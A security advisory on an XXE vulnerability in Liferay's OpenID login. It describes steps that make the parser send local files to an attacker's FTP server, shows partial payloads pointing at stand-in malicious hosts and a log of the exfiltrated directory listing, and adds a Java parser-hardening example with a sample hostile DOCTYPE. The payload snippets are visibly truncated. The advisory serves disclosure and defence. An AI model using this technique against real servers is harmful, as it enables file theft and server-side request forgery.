# XML External Entity XXE vulnerability in OpenID component of Liferay
- Author: Sandro Gauci
- Vulnerable version: Liferay 6.2.3 CE GA4 and earlier
- Liferay reference: LPS-58014
- Advisory URL:
ray-xxe>
- Timeline:
  - Report date: March 16 2015
  - Liferay patch: August 26 2015
  - Liferay advisory: January 18 2016
  - Enable Security advisory: June 1 2016
## Description
Liferay supports OpenID login which was found to make use of a version
of `openid4java` that is vulnerable to XML External Entity (XXE)
attacks.
## Impact
Abuse of the XXE vulnerability can (at least) lead to local file
disclosure, server-side request forgery (SSRF) and denial of service.
This vulnerability was abused to read local files on the web server
that the web application had access to.
## How to reproduce the issue
This issue was previously discovered to affect [one of Google's web
servers](http://ift.tt/1sObmti), which was using the same OpenID library.
To abuse this vulnerability, an attacker needs to:
1. Force Liferay to make use of OpenID for authentication
2. Provide an attacker-controlled URL (web location) as the OpenID URL.
This URL should contain malicious XML (see below)
3. Upon reading the XML, the OpenID library will attempt to load the
external entity on the attacker's web server
4. This external entity instructs the library to read a file from local
disk and make use of its contents to load another file from an attacker
controlled (custom) FTP server
Thus the contents of the file to be read are sent to the custom FTP
server. During exploitation, we had to make use of a fake FTP server
(the `xxe-ftp-server.rb` script shown in the log below) to receive the
information. However, it might be possible to use HTTP and other
protocols too, depending on the version of Java used and other
variables.
For step 1, the attacker needs to locate the authentication form in
Liferay and then click on the OpenID link. The attacker then specifies
an attacker-controlled website as the OpenID URL. This website would
contain the following:
```html
content="http://malicious-site/yadis.xml">
```
As the OpenID library reads that, it loads `yadis.xml` which would
contain the
following:
```xml
%asd;
%rrr;
]>
```
This loads `xxe.xml` which in turn would contain the following:
```xml
'http://ftpmalicious-site:443/%b;'>">
%c;
```
Once the XML interpreter parses these contents, it connects to the FTP
site, sending the contents of the root directory on the server as can
be seen in the following log:
```text
> sudo ruby xxe-ftp-server.rb
FTP. New client connected
< USER anonymous
< PASS Java1.6.0_21@
> 230 more data please!
< TYPE I
> 230 more data please!
< EPSV ALL
> 230 more data please!
< EPSV
> 230 more data please!
< EPRT |1|172.x.x.x|39051|
> 230 more data please!
< bin
> 230 more data please!
< boot
> 230 more data please!
< dev
> 230 more data please!
< etc
> 230 more data please!
< home
> 230 more data please!
... etc
```
Directories and also local files could be read using this method.
Note that sometimes the OpenID login method is hidden but the
functionality is not disabled from within Liferay itself. In such cases,
it is possible to force Liferay to make use of OpenID anyway by setting
the `_58_struts_action` parameter from `/login/login` to
`/login/open_id`.
## Solutions and recommendations
Upgrading to the latest version of Liferay should address this
security vulnerability. The patch was published at the following
location:
Additionally, to address this issue it is recommended to disable
OpenID support.
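The root cause is an XML parser that resolves DTDs and external entities while reading the Yadis/XRDS discovery document. As an added example, not code from the advisory, from openid4java or from Liferay, the following Java snippet shows a JAXP `DocumentBuilderFactory` configured so that an XRDS document carrying a DOCTYPE with a parameter entity (the shape of `yadis.xml` above) is rejected before any entity can be resolved; the class name, both sample documents and the `attacker.invalid` host are constructed for illustration.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class HardenedYadisParser {

    // Build a JAXP parser that cannot load DTDs or external entities,
    // which closes the XXE path through the Yadis/XRDS document.
    static DocumentBuilder newHardenedBuilder() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // XRDS documents never need a DTD; rejecting DOCTYPE outright stops
        // both parameter-entity (%asd;) and general-entity tricks.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Belt and braces for parsers that do not honour the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Returns true when the document was accepted, false when the hardened
    // parser rejected it (the DOCTYPE is refused before any fetch happens).
    static boolean parses(String xml) throws Exception {
        try {
            Document d = newHardenedBuilder().parse(new InputSource(new StringReader(xml)));
            return d.getDocumentElement() != null;
        } catch (SAXParseException e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples: a minimal legitimate XRDS, and one whose DOCTYPE
        // declares a parameter entity pointing at an attacker-controlled host.
        String benign = "<?xml version=\"1.0\"?><xrds:XRDS xmlns:xrds=\"xri://$xrds\" "
            + "xmlns=\"xri://$xrd*($v*2.0)\"><XRD><Service>"
            + "<Type>http://specs.openid.net/auth/2.0/server</Type>"
            + "<URI>https://op.example/endpoint</URI></Service></XRD></xrds:XRDS>";
        String hostile = "<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY % asd SYSTEM "
            + "\"http://attacker.invalid/xxe.xml\"> %asd;]><xrds:XRDS xmlns:xrds=\"xri://$xrds\"/>";
        System.out.println("benign accepted:  " + parses(benign));
        System.out.println("hostile accepted: " + parses(hostile));
    }
}
```

The same feature flags apply to `SAXParserFactory` and `XMLInputFactory`; whichever parser the OpenID library uses, the DOCTYPE must be refused before discovery content is handed to it.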
## About Enable Security
[Enable Security](http://ift.tt/1WZX4SZ) provides Information
Security services, including Penetration Testing, Research and
Development, to help protect client networks and applications against
online attackers.
## Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information. Neither the author
nor the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.
From SecurityFocus Vulnerabilities: http://ift.tt/1WZX19P